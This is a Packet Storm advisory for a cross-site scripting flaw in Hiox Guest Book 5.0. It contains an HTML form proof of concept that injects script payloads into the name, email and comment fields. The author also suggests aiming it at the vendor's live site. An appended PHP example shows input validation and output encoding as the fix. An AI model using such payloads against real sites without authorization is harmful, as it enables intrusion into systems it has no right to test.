Hiox Guest Book 5.0 Cross Site Scripting

2014-01-05T00:00:00
ID PACKETSTORM:124681
Type packetstorm
Reporter JoKeR_StEx
Modified 2014-01-05T00:00:00

Description

                                        
                                            `#############################################################################  
  
# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting   
  
# Author : JoKeR_StEx   
  
# Tested On : Windows   
  
# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip  
  
# Date : 03/01/2014  
  
#############################################################################  
[+] P.O.C  
  
<form action="http://127.0.0.1/HGB/add.php" method="POST">  
<!--In Name -->  
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">  
<!-- In Email -->  
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">  
<!-- in comment -->  
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">  
</form>  
  
[+] To test the exploit (example)  
  
ex:http://www.hscripts.com/scripts/php/HGB/add.php  
  
Just replace http://127.0.0.1/HGB/add.php with http://www.hscripts.com/scripts/php/HGB/add.php ^___^  
  
################################################################################  
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians   
################################################################################  
email : jokerdz44@yahoo.fr  
Facebook : fb.me/imadlilong.lasvegas  
twitter : @JoKeR_StEx  
  
  
  
`
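
The defensive counterpart to the PoC above, as an added example that is not part of the original advisory and is not HGB's own code: validate the three posted fields on input and HTML-encode them at output. Only the field names `name1`, `email` and `cmt` come from the advisory; the function names, length limits and markup are assumptions.

```php
<?php
// Hypothetical helper (not HGB code): encode for HTML text and quoted attributes.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical validation of the three POST fields named in the PoC.
// Returns the cleaned entry, or null when the submission must be rejected.
function validate_entry(array $post): ?array {
    $entry = [];
    // Length limits are assumed values, not taken from HGB.
    foreach (['name1' => 64, 'email' => 254, 'cmt' => 2000] as $field => $maxLen) {
        $value = $post[$field] ?? null;
        // Reject missing fields and array-valued parameters such as name1[]=x.
        if (!is_string($value)) {
            return null;
        }
        $value = trim($value);
        if ($value === '' || strlen($value) > $maxLen) {
            return null;
        }
        $entry[$field] = $value;
    }
    // An email address has a strict grammar, so validate it on input.
    if (filter_var($entry['email'], FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return $entry; // stored raw; encoding happens at output time
}

// Render one entry: every dynamic value passes through e() for its context.
function render_entry(array $entry): string {
    return sprintf(
        '<p class="entry"><b title="%s">%s</b>: %s</p>' . "\n",
        e($entry['email']),
        e($entry['name1']),
        nl2br(e($entry['cmt']))
    );
}

// Constructed input modelled on the PoC: markup in name1 and cmt, valid email.
$post = [
    'name1' => '"><script>prompt(1)</script>',
    'email' => 'visitor@example.com',
    'cmt'   => "<script>prompt('xss (comment)')</script>",
];
$entry = validate_entry($post);
echo $entry === null ? "rejected\n" : render_entry($entry);
```

With the constructed payloads, the angle brackets and quotes reach the browser as `&lt;`, `&gt;`, `&quot;` and `&#039;`, so they display as text instead of being parsed as markup.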